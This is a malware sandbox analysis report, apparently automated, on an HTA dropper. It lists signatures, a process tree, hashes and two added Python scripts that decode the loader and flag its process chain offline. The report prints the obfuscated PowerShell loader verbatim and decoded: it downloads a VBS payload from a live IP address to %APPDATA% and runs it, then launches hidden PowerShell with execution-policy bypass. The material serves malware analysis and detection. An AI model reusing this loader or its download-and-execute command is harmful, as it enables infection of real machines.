Analysis
max time kernel: 122s
max time network: 127s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
submitted: 14-11-2024 02:04
Static task: static1
Behavioral task: behavioral1
  Sample: 0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta
  Resource: win7-20241010-en
Behavioral task: behavioral2
  Sample: 0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta
  Resource: win10v2004-20241007-en
General
Target: 0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta
Size: 207KB
MD5: 1cc49542b6408627091678140cb916c9
SHA1: 66e198338df798a6ef051a71feee749bae890a6d
SHA256: 0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7
SHA512: 1a0a432d112a5f2091c25a629c4a345bd0977207d4451b1581d0b1bdab2375b38207d0e760a56d595fcc975b9d708b897347a7d5a408f1a13c53965d23e9314b
SSDEEP: 96:43F97yT4lwyT4lYv7eZ9emfyFX4T4lTfQ:43F1yT4myT4Kv7eOkyd4T4dQ
Malware Config
Signatures
Blocklisted process makes network request (1 IoC)
  flow 3, PID 3020, pOWeRSheLl.EXE
Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
  Run PowerShell and hide display window.
  PID 948 powershell.exe
  PID 1960 powershell.exe
Evasion via Device Credential Deployment (2 IoCs)
  PID 3020 pOWeRSheLl.EXE
  PID 2672 powershell.exe
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 8 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  pOWeRSheLl.EXE
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  csc.exe
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cvtres.exe
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
Modifies Internet Explorer settings (1 IoC; the signature title was lost in extraction and is restored from the mshta.exe entry in the process tree)
  Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
Suspicious behavior: EnumeratesProcesses (6 IoCs)
  PID 3020 pOWeRSheLl.EXE; PID 2672 powershell.exe; PID 3020 pOWeRSheLl.EXE; PID 3020 pOWeRSheLl.EXE; PID 948 powershell.exe; PID 1960 powershell.exe
Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Token: SeDebugPrivilege  PID 3020 pOWeRSheLl.EXE
  Token: SeDebugPrivilege  PID 2672 powershell.exe
  Token: SeDebugPrivilege  PID 948 powershell.exe
  Token: SeDebugPrivilege  PID 1960 powershell.exe
Suspicious use of WriteProcessMemory (28 IoCs; each of the seven parent-to-child edges below is logged four times)
  PID 2448 mshta.exe       wrote to memory of 3020  (procid_target 30)
  PID 3020 pOWeRSheLl.EXE  wrote to memory of 2672  (procid_target 32)
  PID 3020 pOWeRSheLl.EXE  wrote to memory of 2068  (procid_target 33)
  PID 2068 csc.exe         wrote to memory of 2224  (procid_target 34)
  PID 3020 pOWeRSheLl.EXE  wrote to memory of 2000  (procid_target 36)
  PID 2000 WScript.exe     wrote to memory of 948   (procid_target 37)
  PID 948  powershell.exe  wrote to memory of 1960  (procid_target 39)
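The WriteProcessMemory rows above are, in effect, a parent-to-child creation log, and they are the most compact place to see the shape of this sample: a user-opened .hta relays through three script hosts before the final PowerShell stage runs. The following is an added example for this report, not sandbox code and not the malware's: it parses those rows (duplicates included, to show the de-duplication), takes the pid-to-image map from the process tree that follows, rebuilds lineage, and applies two illustrative detection heuristics: a chain of three or more consecutive script hosts rooted in mshta.exe/wscript.exe, and powershell.exe spawning csc.exe, which is the footprint of Add-Type compiling a P/Invoke stub on the fly. The rule thresholds and the process-name sets are assumptions for illustration, not signatures the sandbox uses.

```python
"""Rebuild process lineage from the WriteProcessMemory rows of this report and
flag the script-host relay (mshta -> powershell -> wscript -> powershell).

Added example for this report; not sandbox code. The rows and the pid->image
map are copied from the report. The chain rule and the process-name sets are
illustrative assumptions, not signatures the sandbox applies.
"""
import re
from collections import defaultdict

# Constructed input: the seven distinct rows from the "Suspicious use of
# WriteProcessMemory" table, with one duplicate left in to exercise de-dup.
WPM_ROWS = """
PID 2448 wrote to memory of 3020 2448 mshta.exe 30
PID 2448 wrote to memory of 3020 2448 mshta.exe 30
PID 3020 wrote to memory of 2672 3020 pOWeRSheLl.EXE 32
PID 3020 wrote to memory of 2068 3020 pOWeRSheLl.EXE 33
PID 2068 wrote to memory of 2224 2068 csc.exe 34
PID 3020 wrote to memory of 2000 3020 pOWeRSheLl.EXE 36
PID 2000 wrote to memory of 948 2000 WScript.exe 37
PID 948 wrote to memory of 1960 948 powershell.exe 39
"""

# Image name per pid, taken from the process tree in this report.
IMAGES = {2448: "mshta.exe", 3020: "pOWeRSheLl.EXE", 2672: "powershell.exe",
          2068: "csc.exe", 2224: "cvtres.exe", 2000: "WScript.exe",
          948: "powershell.exe", 1960: "powershell.exe"}

# Assumed classification used by the heuristics below.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
USER_FILE_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
COMPILERS = {"csc.exe", "vbc.exe"}

_ROW = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) (\d+)")


def parse_wpm_rows(text):
    """Return the distinct (parent_pid, child_pid) edges in first-seen order."""
    edges = []
    for m in _ROW.finditer(text):
        edge = (int(m.group(1)), int(m.group(2)))
        if edge not in edges:
            edges.append(edge)
    return edges


def parents_of(edges):
    return {child: parent for parent, child in edges}


def lineage(pid, edges, images):
    """Image names from the root of the tree down to pid, lower-cased."""
    parent = parents_of(edges)
    chain = [pid]
    while chain[-1] in parent:
        chain.append(parent[chain[-1]])
    return [images[p].lower() for p in reversed(chain)]


def script_host_relays(edges, images, min_hops=3):
    """Leaf chains of >= min_hops consecutive script hosts whose root is a
    host for a user-delivered file (.hta/.vbs). Only leaves are reported so
    a long chain is not also reported once per prefix."""
    children = defaultdict(list)
    for p, c in edges:
        children[p].append(c)
    hits = []
    for pid in images:
        if children[pid]:
            continue
        chain = lineage(pid, edges, images)
        if (len(chain) >= min_hops and chain[0] in USER_FILE_HOSTS
                and all(img in SCRIPT_HOSTS for img in chain)):
            hits.append((pid, chain))
    return hits


def inline_compilations(edges, images):
    """(powershell_pid, compiler_pid) pairs: PowerShell launching csc.exe is
    what Add-Type -MemberDefinition looks like in a process tree."""
    return [(p, c) for p, c in edges
            if images[p].lower() == "powershell.exe"
            and images[c].lower() in COMPILERS]


if __name__ == "__main__":
    edges = parse_wpm_rows(WPM_ROWS)
    for pid, chain in script_host_relays(edges, IMAGES):
        print(f"relay ending in PID {pid}: {' -> '.join(chain)}")
    print("inline compilations:", inline_compilations(edges, IMAGES))
```

Reporting only at leaves means PID 2672 (mshta, powershell, powershell) and PID 1960 (the five-hop chain) are each flagged once; the csc.exe branch is not a relay but is caught by the second heuristic.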
Processes
C:\Windows\SysWOW64\mshta.exe  (PID 2448, level 1)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta"
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE  (PID 3020, level 2, parent 2448)
    Command line: "C:\Windows\SysTeM32\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE" "powersheLL.Exe -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe ; IEx($(IEX('[SySTem.tEXT.eNcodINg]'+[cHAR]58+[cHar]58+'UTf8.gEtSTrinG([SYSTEm.CONvErt]'+[ChAR]0X3A+[cHar]58+'FrOmbaSe64sTrINg('+[chaR]0X22+'JGQzV3JwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJFckRlRmluaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJrdExTUVhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVYb1FHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJIbGxGLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsb3hDeHF1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdXUik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkJaZ1NrT0N3ZnQiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpXYW1SYUx2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRkM1dycDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTY3L3hhbXBwL25jL3NlZXRoZWJlc3RvcHRpb25zdG91bmRlcnN0YW5kZmFzdHRoaW5nc3RvYmVnZXRiYWNrYmlzY3V0LnRJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXN0b3B0aW9uc3RvdW5kZXJzdGFuZGZhc3R0aGluZ3N0b2JlZ2V0LnZiUyIsMCwwKTtTdEFSdC1TbEVlUCgzKTtzdGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdG9wdGlvbnN0b3VuZGVyc3RhbmRmYXN0dGhpbmdzdG9iZWdldC52YlMi'+[ChAr]34+'))')))"
    Decoded payload (the [char] splices resolve to "::" and a double quote, the base64 layer is removed, and the runs of padding spaces are collapsed to one):
    $d3Wrp = add-tYpe -MemBErDeFinitIOn '[DllImport("uRlmON.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr BktLSQXY,string EXoQG,string rHllF,uint loxCxqu,IntPtr gWR);' -NAMe "BZgSkOCwft" -namESPaCe jWamRaLv -PassThru; $d3Wrp::URLDownloadToFile(0,"http://198.46.178.167/xampp/nc/seethebestoptionstounderstandfastthingstobegetbackbiscut.tIF","$eNv:APPDATA\seethebestoptionstounderstandfastthingstobeget.vbS",0,0);StARt-SlEeP(3);starT "$eNv:APPDATA\seethebestoptionstounderstandfastthingstobeget.vbS"
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 2672, level 3, parent 3020)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe
      - Evasion via Device Credential Deployment
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe  (PID 2068, level 3, parent 3020)
      Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gajkybws.cmdline"
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe  (PID 2224, level 4, parent 2068)
        Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES55AF.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC559F.tmp"
        - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\WScript.exe  (PID 2000, level 3, parent 3020)
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS"
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 948, level 4, parent 2000)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 1960, level 5, parent 948)
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
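How the PID 3020 command above unpacks, as an added example for this report (not sandbox output and not the malware's own code). mshta.exe hands PowerShell the whole string as one quoted argument, which PowerShell runs as its command text, so two statements execute: the first, `powersheLL.Exe -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe`, is a nested powershell.exe launch and is exactly what PID 2672 shows on its command line (the `DEVicecreDENTIAldEpLOyMent.EXe` token is what the "Evasion via Device Credential Deployment" tag keys on); the second rebuilds `[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("..."))` out of `[char]` casts, evaluates it, and feeds the result to IEX. The decoded script uses Add-Type to P/Invoke URLDownloadToFile from urlmon.dll (the csc.exe and cvtres.exe children are that compilation), fetches a file with a .tIF name from 198.46.178.167, writes it to %APPDATA% under a .vbS name, sleeps three seconds and starts it, which is the WScript.exe child. The code below re-implements that evaluation offline so nothing is executed; the launcher string and base64 blob are copied verbatim from this report, and the regular expressions are assumptions fitted to this sample's layout, not a general PowerShell parser.

```python
"""Unpack the stage-1 PowerShell command from this report offline.

Added example for this report: not sandbox output and not the malware's code.
The launcher string and base64 blob are copied verbatim from the PID 3020
command line; the regular expressions are assumptions fitted to this sample
([char] splices plus a single FromBase64String layer), not a general
PowerShell parser. Nothing here executes the decoded script.
"""
import base64
import re

# Copied verbatim from the pOWeRSheLl.EXE (PID 3020) command line in this report.
B64_BLOB = "JGQzV3JwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJFckRlRmluaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJrdExTUVhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVYb1FHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJIbGxGLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsb3hDeHF1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdXUik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkJaZ1NrT0N3ZnQiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpXYW1SYUx2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRkM1dycDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTY3L3hhbXBwL25jL3NlZXRoZWJlc3RvcHRpb25zdG91bmRlcnN0YW5kZmFzdHRoaW5nc3RvYmVnZXRiYWNrYmlzY3V0LnRJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXN0b3B0aW9uc3RvdW5kZXJzdGFuZGZhc3R0aGluZ3N0b2JlZ2V0LnZiUyIsMCwwKTtTdEFSdC1TbEVlUCgzKTtzdGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdG9wdGlvbnN0b3VuZGVyc3RhbmRmYXN0dGhpbmdzdG9iZWdldC52YlMi"

# The quoted string mshta.exe hands to PowerShell, with the blob spliced back in.
STAGE1_CMD = (
    "powersheLL.Exe -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe ; "
    "IEx($(IEX('[SySTem.tEXT.eNcodINg]'+[cHAR]58+[cHar]58+'UTf8.gEtSTrinG("
    "[SYSTEm.CONvErt]'+[ChAR]0X3A+[cHar]58+'FrOmbaSe64sTrINg('+[chaR]0X22+'"
    + B64_BLOB + "'+[ChAr]34+'))')))"
)

# '...'+[char]58+[char]58+'...'  ->  '...::...'  (PowerShell string concatenation)
_CHAR_SPLICE = re.compile(
    r"'((?:\s*\+\s*\[char\]\s*(?:0x[0-9a-f]+|\d+))+)\s*\+\s*'", re.I)
_CHAR_NUM = re.compile(r"\[char\]\s*(0x[0-9a-f]+|\d+)", re.I)
_B64_ARG = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=]+)"\s*\)', re.I)


def resolve_char_splices(text):
    """Replace every [char]N concatenation with the characters it builds."""
    def join(m):
        return "".join(chr(int(n, 0)) for n in _CHAR_NUM.findall(m.group(1)))
    return _CHAR_SPLICE.sub(join, text)


def decode_base64_layer(text):
    """Decode the FromBase64String("...") argument as UTF-8, repairing
    missing '=' padding rather than failing on it."""
    m = _B64_ARG.search(text)
    if m is None:
        raise ValueError("no FromBase64String() argument found")
    blob = m.group(1)
    return base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-8")


def extract_indicators(script):
    """Pull the P/Invoked DLL and API, download URL, drop path, started file
    and sleep delay out of the decoded stage-1 script (regexes are assumptions
    fitted to this sample's layout)."""
    s = re.sub(r"\s+", " ", script)  # the sample pads tokens with long space runs
    dll = re.search(r'\[DllImport\(\s*"([^"]+)"', s, re.I)
    api = re.search(r"extern\s+\w+\s+(\w+)\s*\(", s, re.I)
    call = None
    if api:
        call = re.search(re.escape(api.group(1)) +
                         r'\(\s*0\s*,\s*"([^"]+)"\s*,\s*"([^"]+)"', s, re.I)
    launch = re.search(r'\bstart\s+"([^"]+)"', s, re.I)
    sleep = re.search(r"start-sleep\s*\(?\s*(\d+)", s, re.I)
    return {
        "dll": dll.group(1) if dll else None,
        "api": api.group(1) if api else None,
        "url": call.group(1) if call else None,
        "drop_path": call.group(2) if call else None,
        "launched": launch.group(1) if launch else None,
        "sleep_seconds": int(sleep.group(1)) if sleep else None,
        "script": s,
    }


def analyze_stage1(cmdline):
    """Split the two statements PowerShell sees: the first is the nested
    launcher (PID 2672 in the report), the second carries the payload."""
    first, _, rest = cmdline.partition(";")
    launcher = first.strip()
    result = extract_indicators(decode_base64_layer(resolve_char_splices(rest)))
    result["nested_launcher"] = launcher
    result["decoy_binary"] = launcher.split()[-1]
    result["exec_bypass"] = bool(re.search(r"-e\w*\s+bypass", launcher, re.I))
    result["no_profile"] = bool(re.search(r"-nop\b", launcher, re.I))
    result["hidden_window"] = bool(re.search(r"-w\w*\s+(?:1|hidden)\b", launcher, re.I))
    return result


if __name__ == "__main__":
    for key, value in analyze_stage1(STAGE1_CMD).items():
        print(f"{key:16} {value}")
```

The whitespace padding and the mixed-case cmdlet names in the blob defeat naive string matching, which is why the indicators are pulled out after decoding and collapsing the script rather than from the raw command line. The URL and the drop path recovered here are the network and file indicators to pivot on.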
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 1KB
  MD5: cfb7007c6136321ce57ceae71b134418
  SHA1: 3db4537ca974b0ea9b951099d9579754efe32134
  SHA256: 83c88eced98885b81beb5d6e53e6cf25f5f6bfb5c20d9e443461753573c05200
  SHA512: 59497e35bee4b0eba64ec15319e6747255b3eafe04f781c912a3c02766cf8a7ec1f0b7f0234a0e554af2fa1b9323a4c31b1f6b17d9bc6f8a8aa7bb317d96b5f1
- Filesize: 3KB
  MD5: 8302414a34d62a438c28cabab3b7a40e
  SHA1: 04bd5cbdda34be8ba1d039ad25b61469fb2960d7
  SHA256: c853a9fd5b796bd9a1ed6f6a9d1205797e5d410b7f50e9ec7880c6d782cc60af
  SHA512: 7b25341c043fe58ad5e49466112e5ca68709bebe46579c3e9d1e00fc3c176611f39aa27a8e9dca9310526987b5ec461d35925db2b67b68e163a4884dbcf3e840
- Filesize: 7KB
  MD5: ac915f97237545697225fb9f21b17c4d
  SHA1: aa48c6e376a9e92e41a2dbd8d86774d078ed17f4
  SHA256: f88b043e55a6d6e2451d2c9ac527a1bec563525eaa54d4054fcbdd6e92a34df8
  SHA512: c8d48e55a44a899b50152a3411279e6d8da22e48a7b8c123a2b6ac79ba9f49b9e6d00cbeba29284822e4693cd20d03e3472d2154e4e29fc14f875fa6e00cce96
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: fbd917f6d90002f6564f790cf6ae0c46
  SHA1: 32bff93a180f61410917cf7082617510c8bca454
  SHA256: 50ebd0b684de3496de6565295dfbe24d702fe73d1f209be1ea2aeb6d1e9fd894
  SHA512: 4b5f092903b511f87a926ecf5b02771f3e055eeef98665aa5b4093c04bbb0f473407a48f87e747a1815a426656967d76082a5883021c3c892ed49c9ba48068fc
- Filesize: 138KB
  MD5: 4f46597a54e903c400cac4db5a222ecb
  SHA1: 0a2f30da05a532bfbddaba3af235011d60db8fc8
  SHA256: ba78e6d4f42b1aab53a731c9bd0820d2f0278170eb5ef92604f32e92cfcb8246
  SHA512: ffac65a2a99fe7c3883bb82f5736dbcbcdd8e3d8cecd265fda76e7b7d07d266f1f0b11eaa3adcf714a7e50314d3e140e50799e5b52fe2494da05f504912f344a
- Filesize: 0B (the four digests below are those of an empty file; the page lists no size for this entry)
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
- Filesize: 652B
  MD5: 651eab3d69a3935ee7394499c5bd05cb
  SHA1: 96bdfb0e540f1f5c780cc9063d41c8c49a50b7d7
  SHA256: 54405b4f4c645130db3743fc016b371b7c85f2f2551e71c8332ab37c17a05bcd
  SHA512: 3a8f966a7b5b37ad3100f69e40b85391c007949a934b00de87973ac0e90fb537bbde1b28c7d3f53b813e9263936467cc8643e7f292dcaaf21a084444683c63dc
- Filesize: 483B
  MD5: 0b9734ed54c4f41d0c94957b007eb3d5
  SHA1: ebabbb2d826295a994ba691d921a4c7c5ed506d1
  SHA256: 36632527d6cce240e5833d6251632127fd95f085c35a3aa2a363be2f2cbc84fa
  SHA512: d32ebc74674dd75c354a9b74324421a2a4af0a2d6feeb3735d3fab857fb488aaf8be88f4687299c614b6e70556b3980ba007ba02abb8e5e341a2cabccdd10b17
- Filesize: 309B
  MD5: ad0abdfe1d391631322dbcf7f85d256a
  SHA1: 0df977f2d9557da9f7367a68ca17fed54e544db3
  SHA256: 5cbd4a61f32011d5dbb77c39dfe3002f51463a3bd2c40f1f5fa4645b5f351226
  SHA512: 92455bc99bd95e05479751efbbf2c63d6dd95d4716eee029951036a89546dfeb109707f3ae2ff172995c510e620f0999a3bda415a5975aace2acc43b9a4dd17b